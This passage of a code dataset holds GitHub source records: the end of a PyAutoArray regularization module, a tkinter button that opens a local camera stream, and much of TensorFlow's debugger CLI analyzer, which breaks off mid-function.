regularization.\r\n\r\n Returns\r\n -------\r\n The regularization matrix.\r\n \"\"\"\r\n regularization_weights = self.regularization_weights_from(linear_obj=linear_obj)\r\n\r\n return regularization_util.brightness_zeroth_regularization_matrix_from(\r\n regularization_weights=regularization_weights\r\n )\r\n","repo_name":"Jammy2211/PyAutoArray","sub_path":"autoarray/inversion/regularization/brightness_zeroth.py","file_name":"brightness_zeroth.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
+{"seq_id":"42212628905","text":"from tkinter import *\nimport webbrowser\n\nroot = Tk()\n\nnew = 1\nurl = \"http://192.168.156.87:8080/\" #Replace with the ip of stream\n\ndef openweb():\n webbrowser.open(url,new=new)\n\nBtn = Button(root, text = \"Stream Cam\",command=openweb)\nBtn.pack()\n\nroot.mainloop()\n","repo_name":"Pritesh-0/rudra_training","sub_path":"guistream.py","file_name":"guistream.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4001291954","text":"import argparse\nimport copy\nimport re\n\n\nfrom tensorflow.python.debug.cli import cli_config\nfrom tensorflow.python.debug.cli import cli_shared\nfrom tensorflow.python.debug.cli import command_parser\nfrom tensorflow.python.debug.cli import debugger_cli_common\nfrom tensorflow.python.debug.cli import evaluator\nfrom tensorflow.python.debug.cli import ui_factory\nfrom tensorflow.python.debug.lib import debug_graphs\nfrom tensorflow.python.debug.lib import source_utils\n\nRL = debugger_cli_common.RichLine\n\n# String constants for the depth-dependent hanging indent at the beginning\n# of each line.\nHANG_UNFINISHED = \"| \" # Used for unfinished recursion depths.\nHANG_FINISHED = \" \"\nHANG_SUFFIX = \"|- \"\n\n# String constant for displaying depth and op type.\nDEPTH_TEMPLATE = \"(%d) \"\nOP_TYPE_TEMPLATE = \"[%s] \"\n\n# String constants for control inputs/outputs, etc.\nCTRL_LABEL = \"(Ctrl) \"\nELLIPSIS = \"...\"\n\nSORT_TENSORS_BY_TIMESTAMP = \"timestamp\"\nSORT_TENSORS_BY_DUMP_SIZE = \"dump_size\"\nSORT_TENSORS_BY_OP_TYPE = \"op_type\"\nSORT_TENSORS_BY_TENSOR_NAME = \"tensor_name\"\n\n\ndef _add_main_menu(output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=True,\n enable_print_tensor=True,\n enable_list_inputs=True,\n enable_list_outputs=True):\n \"\"\"Generate main menu for the screen output from a command.\n\n Args:\n output: (debugger_cli_common.RichTextLines) the output object to modify.\n node_name: (str or None) name of the node involved (if any). If None,\n the menu items node_info, list_inputs and list_outputs will be\n automatically disabled, overriding the values of arguments\n enable_node_info, enable_list_inputs and enable_list_outputs.\n enable_list_tensors: (bool) whether the list_tensor menu item will be\n enabled.\n enable_node_info: (bool) whether the node_info item will be enabled.\n enable_print_tensor: (bool) whether the print_tensor item will be enabled.\n enable_list_inputs: (bool) whether the item list_inputs will be enabled.\n enable_list_outputs: (bool) whether the item list_outputs will be enabled.\n \"\"\"\n\n menu = debugger_cli_common.Menu()\n\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_tensors\", \"list_tensors\", enabled=enable_list_tensors))\n\n if node_name:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\",\n \"node_info -a -d -t %s\" % node_name,\n enabled=enable_node_info))\n menu.append(\n debugger_cli_common.MenuItem(\n \"print_tensor\",\n \"print_tensor %s\" % node_name,\n enabled=enable_print_tensor))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_inputs\",\n \"list_inputs -c -r %s\" % node_name,\n enabled=enable_list_inputs))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_outputs\",\n \"list_outputs -c -r %s\" % node_name,\n enabled=enable_list_outputs))\n else:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"print_tensor\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_inputs\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_outputs\", None, enabled=False))\n\n menu.append(\n debugger_cli_common.MenuItem(\"run_info\", \"run_info\"))\n menu.append(\n debugger_cli_common.MenuItem(\"help\", \"help\"))\n\n output.annotations[debugger_cli_common.MAIN_MENU_KEY] = menu\n\n\nclass DebugAnalyzer(object):\n \"\"\"Analyzer for debug data from dump directories.\"\"\"\n\n _TIMESTAMP_COLUMN_HEAD = \"t (ms)\"\n _DUMP_SIZE_COLUMN_HEAD = \"Size (B)\"\n _OP_TYPE_COLUMN_HEAD = \"Op type\"\n _TENSOR_NAME_COLUMN_HEAD = \"Tensor name\"\n\n # Op types to be omitted when generating descriptions of graph structure.\n _GRAPH_STRUCT_OP_TYPE_DENYLIST = (\"_Send\", \"_Recv\", \"_HostSend\", \"_HostRecv\",\n \"_Retval\")\n\n def __init__(self, debug_dump, config):\n \"\"\"DebugAnalyzer constructor.\n\n Args:\n debug_dump: A DebugDumpDir object.\n config: A `cli_config.CLIConfig` object that carries user-facing\n configurations.\n \"\"\"\n\n self._debug_dump = debug_dump\n self._evaluator = evaluator.ExpressionEvaluator(self._debug_dump)\n\n # Initialize tensor filters state.\n self._tensor_filters = {}\n\n self._build_argument_parsers(config)\n config.set_callback(\"graph_recursion_depth\",\n self._build_argument_parsers)\n\n # TODO(cais): Implement list_nodes.\n\n def _build_argument_parsers(self, config):\n \"\"\"Build argument parsers for DebugAnalayzer.\n\n Args:\n config: A `cli_config.CLIConfig` object.\n\n Returns:\n A dict mapping command handler name to `ArgumentParser` instance.\n \"\"\"\n # Argument parsers for command handlers.\n self._arg_parsers = {}\n\n # Parser for list_tensors.\n ap = argparse.ArgumentParser(\n description=\"List dumped intermediate tensors.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"-f\",\n \"--tensor_filter\",\n dest=\"tensor_filter\",\n type=str,\n default=\"\",\n help=\"List only Tensors passing the filter of the specified name\")\n ap.add_argument(\n \"-fenn\",\n \"--filter_exclude_node_names\",\n dest=\"filter_exclude_node_names\",\n type=str,\n default=\"\",\n help=\"When applying the tensor filter, exclude node with names \"\n \"matching the regular expression. Applicable only if --tensor_filter \"\n \"or -f is used.\")\n ap.add_argument(\n \"-n\",\n \"--node_name_filter\",\n dest=\"node_name_filter\",\n type=str,\n default=\"\",\n help=\"filter node name by regex.\")\n ap.add_argument(\n \"-t\",\n \"--op_type_filter\",\n dest=\"op_type_filter\",\n type=str,\n default=\"\",\n help=\"filter op type by regex.\")\n ap.add_argument(\n \"-s\",\n \"--sort_by\",\n dest=\"sort_by\",\n type=str,\n default=SORT_TENSORS_BY_TIMESTAMP,\n help=(\"the field to sort the data by: (%s | %s | %s | %s)\" %\n (SORT_TENSORS_BY_TIMESTAMP, SORT_TENSORS_BY_DUMP_SIZE,\n SORT_TENSORS_BY_OP_TYPE, SORT_TENSORS_BY_TENSOR_NAME)))\n ap.add_argument(\n \"-r\",\n \"--reverse\",\n dest=\"reverse\",\n action=\"store_true\",\n help=\"sort the data in reverse (descending) order\")\n self._arg_parsers[\"list_tensors\"] = ap\n\n # Parser for node_info.\n ap = argparse.ArgumentParser(\n description=\"Show information about a node.\", usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an associated tensor, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-a\",\n \"--attributes\",\n dest=\"attributes\",\n action=\"store_true\",\n help=\"Also list attributes of the node.\")\n ap.add_argument(\n \"-d\",\n \"--dumps\",\n dest=\"dumps\",\n action=\"store_true\",\n help=\"Also list dumps available from the node.\")\n ap.add_argument(\n \"-t\",\n \"--traceback\",\n dest=\"traceback\",\n action=\"store_true\",\n help=\"Also include the traceback of the node's creation \"\n \"(if available in Python).\")\n self._arg_parsers[\"node_info\"] = ap\n\n # Parser for list_inputs.\n ap = argparse.ArgumentParser(\n description=\"Show inputs to a node.\", usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the input tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show inputs to the node recursively, i.e., the input tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of input nodes.\")\n self._arg_parsers[\"list_inputs\"] = ap\n\n # Parser for list_outputs.\n ap = argparse.ArgumentParser(\n description=\"Show the nodes that receive the outputs of given node.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the output tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show recipients of the node recursively, i.e., the output \"\n \"tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of recipient nodes.\")\n self._arg_parsers[\"list_outputs\"] = ap\n\n # Parser for print_tensor.\n self._arg_parsers[\"print_tensor\"] = (\n command_parser.get_print_tensor_argparser(\n \"Print the value of a dumped tensor.\"))\n\n # Parser for print_source.\n ap = argparse.ArgumentParser(\n description=\"Print a Python source file with overlaid debug \"\n \"information, including the nodes (ops) or Tensors created at the \"\n \"source lines.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"source_file_path\",\n type=str,\n help=\"Path to the source file.\")\n ap.add_argument(\n \"-t\",\n \"--tensors\",\n dest=\"tensors\",\n action=\"store_true\",\n help=\"Label lines with dumped Tensors, instead of ops.\")\n ap.add_argument(\n \"-m\",\n \"--max_elements_per_line\",\n type=int,\n default=10,\n help=\"Maximum number of elements (ops or Tensors) to show per source \"\n \"line.\")\n ap.add_argument(\n \"-b\",\n \"--line_begin\",\n type=int,\n default=1,\n help=\"Print source beginning at line number (1-based.)\")\n self._arg_parsers[\"print_source\"] = ap\n\n # Parser for list_source.\n ap = argparse.ArgumentParser(\n description=\"List source files responsible for constructing nodes and \"\n \"tensors present in the run().\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"-p\",\n \"--path_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for file path.\")\n ap.add_argument(\n \"-n\",\n \"--node_name_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for node name.\")\n self._arg_parsers[\"list_source\"] = ap\n\n # Parser for eval.\n ap = argparse.ArgumentParser(\n description=\"\"\"Evaluate an arbitrary expression. Can use tensor values\n from the current debug dump. The debug tensor names should be enclosed\n in pairs of backticks. Expressions with spaces should be enclosed in\n a pair of double quotes or a pair of single quotes. By default, numpy\n is imported as np and can be used in the expressions. E.g.,\n 1) eval np.argmax(`Softmax:0`),\n 2) eval 'np.sum(`Softmax:0`, axis=1)',\n 3) eval \"np.matmul((`output/Identity:0`/`Softmax:0`).T, `Softmax:0`)\".\n \"\"\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"expression\",\n type=str,\n help=\"\"\"Expression to be evaluated.\n 1) in the simplest case, use :, e.g.,\n hidden_0/MatMul:0.\n\n 2) if the default debug op \"DebugIdentity\" is to be overridden, use\n ::, e.g.,\n hidden_0/MatMul:0:DebugNumericSummary.\n\n 3) if the tensor of the same name exists on more than one device, use\n ::[:], e.g.,\n /job:worker/replica:0/task:0/gpu:0:hidden_0/MatMul:0\n /job:worker/replica:0/task:2/cpu:0:hidden_0/MatMul:0:DebugNanCount.\n\n 4) if the tensor is executed multiple times in a given `Session.run`\n call, specify the execution index with a 0-based integer enclose in a\n pair of brackets at the end, e.g.,\n RNN/tanh:0[0]\n /job:worker/replica:0/task:0/gpu:0:RNN/tanh:0[0].\"\"\")\n ap.add_argument(\n \"-a\",\n \"--all\",\n dest=\"print_all\",\n action=\"store_true\",\n help=\"Print the tensor in its entirety, i.e., do not use ellipses \"\n \"(may be slow for large results).\")\n ap.add_argument(\n \"-w\",\n \"--write_path\",\n default=\"\",\n help=\"Path of the numpy file to write the evaluation result to, \"\n \"using numpy.save()\")\n self._arg_parsers[\"eval\"] = ap\n\n def add_tensor_filter(self, filter_name, filter_callable):\n \"\"\"Add a tensor filter.\n\n A tensor filter is a named callable of the signature:\n filter_callable(dump_datum, tensor),\n\n wherein dump_datum is an instance of debug_data.DebugTensorDatum carrying\n metadata about the dumped tensor, including tensor name, timestamps, etc.\n tensor is the value of the dumped tensor as an numpy.ndarray object.\n The return value of the function is a bool.\n This is the same signature as the input argument to\n debug_data.DebugDumpDir.find().\n\n Args:\n filter_name: (str) name of the filter. Cannot be empty.\n filter_callable: (callable) a filter function of the signature described\n as above.\n\n Raises:\n ValueError: If filter_name is an empty str.\n TypeError: If filter_name is not a str.\n Or if filter_callable is not callable.\n \"\"\"\n\n if not isinstance(filter_name, str):\n raise TypeError(\"Input argument filter_name is expected to be str, \"\n \"but is not.\")\n\n # Check that filter_name is not an empty str.\n if not filter_name:\n raise ValueError(\"Input argument filter_name cannot be empty.\")\n\n # Check that filter_callable is callable.\n if not callable(filter_callable):\n raise TypeError(\n \"Input argument filter_callable is expected to be callable, \"\n \"but is not.\")\n\n self._tensor_filters[filter_name] = filter_callable\n\n def get_tensor_filter(self, filter_name):\n \"\"\"Retrieve filter function by name.\n\n Args:\n filter_name: Name of the filter set during add_tensor_filter() call.\n\n Returns:\n The callable associated with the filter name.\n\n Raises:\n ValueError: If there is no tensor filter of the specified filter name.\n \"\"\"\n\n if filter_name not in self._tensor_filters:\n raise ValueError(\"There is no tensor filter named \\\"%s\\\"\" % filter_name)\n\n return self._tensor_filters[filter_name]\n\n def get_help(self, handler_name):\n return self._arg_parsers[handler_name].format_help()\n\n def list_tensors(self, args, screen_info=None):\n \"\"\"Command handler for list_tensors.\n\n List tensors dumped during debugged Session.run() call.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n\n Raises:\n ValueError: If `--filter_exclude_node_names` is used without `-f` or\n `--tensor_filter` being used.\n \"\"\"\n\n # TODO(cais): Add annotations of substrings for dumped tensor names, to\n # facilitate on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"list_tensors\"].parse_args(args)\n\n output = []\n\n filter_strs = []\n if parsed.op_type_filter:\n op_type_regex = re.compile(parsed.op_type_filter)\n filter_strs.append(\"Op type regex filter: \\\"%s\\\"\" % parsed.op_type_filter)\n else:\n op_type_regex = None\n\n if parsed.node_name_filter:\n node_name_regex = re.compile(parsed.node_name_filter)\n filter_strs.append(\"Node name regex filter: \\\"%s\\\"\" %\n parsed.node_name_filter)\n else:\n node_name_regex = None\n\n output = debugger_cli_common.RichTextLines(filter_strs)\n output.append(\"\")\n\n if parsed.tensor_filter:\n try:\n filter_callable = self.get_tensor_filter(parsed.tensor_filter)\n except ValueError:\n output = cli_shared.error(\"There is no tensor filter named \\\"%s\\\".\" %\n parsed.tensor_filter)\n _add_main_menu(output, node_name=None, enable_list_tensors=False)\n return output\n\n data_to_show = self._debug_dump.find(\n filter_callable,\n exclude_node_names=parsed.filter_exclude_node_names)\n else:\n if parsed.filter_exclude_node_names:\n raise ValueError(\n \"The flag --filter_exclude_node_names is valid only when \"\n \"the flag -f or --tensor_filter is used.\")\n\n data_to_show = self._debug_dump.dumped_tensor_data\n\n # TODO(cais): Implement filter by lambda on tensor value.\n\n max_timestamp_width, max_dump_size_width, max_op_type_width = (\n self._measure_tensor_list_column_widths(data_to_show))\n\n # Sort the data.\n data_to_show = self._sort_dump_data_by(\n data_to_show, parsed.sort_by, parsed.reverse)\n\n output.extend(\n self._tensor_list_column_heads(parsed, max_timestamp_width,\n max_dump_size_width, max_op_type_width))\n\n dump_count = 0\n for dump in data_to_show:\n if node_name_regex and not node_name_regex.match(dump.node_name):\n continue\n\n if op_type_regex:\n op_type = self._debug_dump.node_op_type(dump.node_name)\n if not op_type_regex.match(op_type):\n continue\n\n rel_time = (dump.timestamp - self._debug_dump.t0) / 1000.0\n dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n dumped_tensor_name = \"%s:%d\" % (dump.node_name, dump.output_slot)\n op_type = self._debug_dump.node_op_type(dump.node_name)\n\n line = \"[%.3f]\" % rel_time\n line += \" \" * (max_timestamp_width - len(line))\n line += dump_size_str\n line += \" \" * (max_timestamp_width + max_dump_size_width - len(line))\n line += op_type\n line += \" \" * (max_timestamp_width + max_dump_size_width +\n max_op_type_width - len(line))\n line += dumped_tensor_name\n\n output.append(\n line,\n font_attr_segs=[(\n len(line) - len(dumped_tensor_name), len(line),\n debugger_cli_common.MenuItem(\"\", \"pt %s\" % dumped_tensor_name))])\n dump_count += 1\n\n if parsed.tensor_filter:\n output.prepend([\n \"%d dumped tensor(s) passing filter \\\"%s\\\":\" %\n (dump_count, parsed.tensor_filter)\n ])\n else:\n output.prepend([\"%d dumped tensor(s):\" % dump_count])\n\n _add_main_menu(output, node_name=None, enable_list_tensors=False)\n return output\n\n def _measure_tensor_list_column_widths(self, data):\n \"\"\"Determine the maximum widths of the timestamp and op-type column.\n\n This method assumes that data is sorted in the default order, i.e.,\n by ascending timestamps.\n\n Args:\n data: (list of DebugTensorDaum) the data based on which the maximum\n column widths will be determined.\n\n Returns:\n (int) maximum width of the timestamp column. 0 if data is empty.\n (int) maximum width of the dump size column. 0 if data is empty.\n (int) maximum width of the op type column. 0 if data is empty.\n \"\"\"\n\n max_timestamp_width = 0\n if data:\n max_rel_time_ms = (data[-1].timestamp - self._debug_dump.t0) / 1000.0\n max_timestamp_width = len(\"[%.3f] \" % max_rel_time_ms) + 1\n max_timestamp_width = max(max_timestamp_width,\n len(self._TIMESTAMP_COLUMN_HEAD) + 1)\n\n max_dump_size_width = 0\n for dump in data:\n dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n if len(dump_size_str) + 1 > max_dump_size_width:\n max_dump_size_width = len(dump_size_str) + 1\n max_dump_size_width = max(max_dump_size_width,\n len(self._DUMP_SIZE_COLUMN_HEAD) + 1)\n\n max_op_type_width = 0\n for dump in data:\n op_type = self._debug_dump.node_op_type(dump.node_name)\n if len(op_type) + 1 > max_op_type_width:\n max_op_type_width = len(op_type) + 1\n max_op_type_width = max(max_op_type_width,\n len(self._OP_TYPE_COLUMN_HEAD) + 1)\n\n return max_timestamp_width, max_dump_size_width, max_op_type_width\n\n def _sort_dump_data_by(self, data, sort_by, reverse):\n \"\"\"Sort a list of DebugTensorDatum in specified order.\n\n Args:\n data: (list of DebugTensorDatum) the data to be sorted.\n sort_by: The field to sort data by.\n reverse: (bool) Whether to use reversed (descending) order.\n\n Returns:\n (list of DebugTensorDatum) in sorted order.\n\n Raises:\n ValueError: given an invalid value of sort_by.\n \"\"\"\n\n if sort_by == SORT_TENSORS_BY_TIMESTAMP:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: x.timestamp)\n elif sort_by == SORT_TENSORS_BY_DUMP_SIZE:\n return sorted(data, reverse=reverse, key=lambda x: x.dump_size_bytes)\n elif sort_by == SORT_TENSORS_BY_OP_TYPE:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: self._debug_dump.node_op_type(x.node_name))\n elif sort_by == SORT_TENSORS_BY_TENSOR_NAME:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: \"%s:%d\" % (x.node_name, x.output_slot))\n else:\n raise ValueError(\"Unsupported key to sort tensors by: %s\" % sort_by)\n\n def _tensor_list_column_heads(self, parsed, max_timestamp_width,\n max_dump_size_width, max_op_type_width):\n \"\"\"Generate a line containing the column heads of the tensor list.\n\n Args:\n parsed: Parsed arguments (by argparse) of the list_tensors command.\n max_timestamp_width: (int) maximum width of the timestamp column.\n max_dump_size_width: (int) maximum width of the dump size column.\n max_op_type_width: (int) maximum width of the op type column.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n base_command = \"list_tensors\"\n if parsed.tensor_filter:\n base_command += \" -f %s\" % parsed.tensor_filter\n if parsed.op_type_filter:\n base_command += \" -t %s\" % parsed.op_type_filter\n if parsed.node_name_filter:\n base_command += \" -n %s\" % parsed.node_name_filter\n\n attr_segs = {0: []}\n row = self._TIMESTAMP_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TIMESTAMP)\n if parsed.sort_by == SORT_TENSORS_BY_TIMESTAMP and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append(\n (0, len(row), [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_timestamp_width - len(row))\n\n prev_len = len(row)\n row += self._DUMP_SIZE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_DUMP_SIZE)\n if parsed.sort_by == SORT_TENSORS_BY_DUMP_SIZE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_dump_size_width + max_timestamp_width - len(row))\n\n prev_len = len(row)\n row += self._OP_TYPE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_OP_TYPE)\n if parsed.sort_by == SORT_TENSORS_BY_OP_TYPE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n prev_len = len(row)\n row += self._TENSOR_NAME_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TENSOR_NAME)\n if parsed.sort_by == SORT_TENSORS_BY_TENSOR_NAME and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(\"\", command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n return debugger_cli_common.RichTextLines([row], font_attr_segs=attr_segs)\n\n def node_info(self, args, screen_info=None):\n \"\"\"Command handler for node_info.\n\n Query information about a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # TODO(cais): Add annotation of substrings for node names, to facilitate\n # on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"node_info\"].parse_args(args)\n\n # Get a node name, regardless of whether the input is a node name (without\n # output slot attached) or a tensor name (with output slot attached).\n node_name, unused_slot = debug_graphs.parse_node_or_tensor_name(\n parsed.node_name)\n\n if not self._debug_dump.node_exists(node_name):\n output = cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=False,\n enable_list_inputs=False,\n enable_list_outputs=False)\n return output\n\n # TODO(cais): Provide UI glossary feature to explain to users what the\n # term \"partition graph\" means and how it is related to TF graph objects\n # in Python. The information can be along the line of:\n # \"A tensorflow graph defined in Python is stripped of unused ops\n # according to the feeds and fetches and divided into a number of\n # partition graphs that may be distributed among multiple devices and\n # hosts. The partition graphs are what's actually executed by the C++\n # runtime during a run() call.\"\n\n lines = [\"Node %s\" % node_name]\n font_attr_segs = {\n 0: [(len(lines[-1]) - len(node_name), len(lines[-1]), \"bold\")]\n }\n lines.append(\"\")\n lines.append(\" Op: %s\" % self._debug_dump.node_op_type(node_name))\n lines.append(\" Device: %s\" % self._debug_dump.node_device(node_name))\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n # List node inputs (non-control and control).\n inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name))\n ctrl_inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name, is_control=True))\n output.extend(self._format_neighbors(\"input\", inputs, ctrl_inputs))\n\n # List node output recipients (non-control and control).\n recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name))\n ctrl_recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name, is_control=True))\n output.extend(self._format_neighbors(\"recipient\", recs, ctrl_recs))\n\n # Optional: List attributes of the node.\n if parsed.attributes:\n output.extend(self._list_node_attributes(node_name))\n\n # Optional: List dumps available from the node.\n if parsed.dumps:\n output.extend(self._list_node_dumps(node_name))\n\n if parsed.traceback:\n output.extend(self._render_node_traceback(node_name))\n\n _add_main_menu(output, node_name=node_name, enable_node_info=False)\n return output\n\n def _exclude_denylisted_ops(self, node_names):\n \"\"\"Exclude all nodes whose op types are in _GRAPH_STRUCT_OP_TYPE_DENYLIST.\n\n Args:\n node_names: An iterable of node or graph element names.\n\n Returns:\n A list of node names that are not denylisted.\n \"\"\"\n return [\n node_name for node_name in node_names\n if self._debug_dump.node_op_type(debug_graphs.get_node_name(node_name))\n not in self._GRAPH_STRUCT_OP_TYPE_DENYLIST\n ]\n\n def _render_node_traceback(self, node_name):\n \"\"\"Render traceback of a node's creation in Python, if available.\n\n Args:\n node_name: (str) name of the node.\n\n Returns:\n A RichTextLines object containing the stack trace of the node's\n construction.\n \"\"\"\n\n lines = [RL(\"\"), RL(\"\"), RL(\"Traceback of node construction:\", \"bold\")]\n\n try:\n node_stack = self._debug_dump.node_traceback(node_name)\n for depth, (file_path, line, function_name, text) in enumerate(\n node_stack):\n lines.append(\"%d: %s\" % (depth, file_path))\n\n attribute = debugger_cli_common.MenuItem(\n \"\", \"ps %s -b %d\" % (file_path, line)) if text else None\n line_number_line = RL(\" \")\n line_number_line += RL(\"Line: %d\" % line, attribute)\n lines.append(line_number_line)\n\n lines.append(\" Function: %s\" % function_name)\n lines.append(\" Text: \" + ((\"\\\"%s\\\"\" % text) if text else \"None\"))\n lines.append(\"\")\n except KeyError:\n lines.append(\"(Node unavailable in the loaded Python graph)\")\n except LookupError:\n lines.append(\"(Unavailable because no Python graph has been loaded)\")\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_inputs(self, args, screen_info=None):\n \"\"\"Command handler for inputs.\n\n Show inputs to a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # Screen info not currently used by this handler. Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_inputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=False)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_inputs=False)\n\n return output\n\n def print_tensor(self, args, screen_info=None):\n \"\"\"Command handler for print_tensor.\n\n Print value of a given dumped tensor.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n parsed = self._arg_parsers[\"print_tensor\"].parse_args(args)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n\n # Determine if any range-highlighting is required.\n highlight_options = cli_shared.parse_ranges_highlight(parsed.ranges)\n\n tensor_name, tensor_slicing = (\n command_parser.parse_tensor_name_with_slicing(parsed.tensor_name))\n\n node_name, output_slot = debug_graphs.parse_node_or_tensor_name(tensor_name)\n if (self._debug_dump.loaded_partition_graphs() and\n not self._debug_dump.node_exists(node_name)):\n output = cli_shared.error(\n \"Node \\\"%s\\\" does not exist in partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_print_tensor=False)\n return output\n\n watch_keys = self._debug_dump.debug_watch_keys(node_name)\n if output_slot is None:\n output_slots = set()\n for watch_key in watch_keys:\n output_slots.add(int(watch_key.split(\":\")[1]))\n\n if len(output_slots) == 1:\n # There is only one dumped tensor from this node, so there is no\n # ambiguity. Proceed to show the only dumped tensor.\n output_slot = list(output_slots)[0]\n else:\n # There are more than one dumped tensors from this node. Indicate as\n # such.\n # TODO(cais): Provide an output screen with command links for\n # convenience.\n lines = [\n \"Node \\\"%s\\\" generated debug dumps from %s output slots:\" %\n (node_name, len(output_slots)),\n \"Please specify the output slot: %s:x.\" % node_name\n ]\n output = debugger_cli_common.RichTextLines(lines)\n _add_main_menu(\n output,\n node_name=node_name,\n enable_list_tensors=True,\n enable_print_tensor=False)\n return output\n\n # Find debug dump data that match the tensor name (node name + output\n # slot).\n matching_data = []\n for watch_key in watch_keys:\n debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n for datum in debug_tensor_data:\n if datum.output_slot == output_slot:\n matching_data.append(datum)\n\n if not matching_data:\n # No dump for this 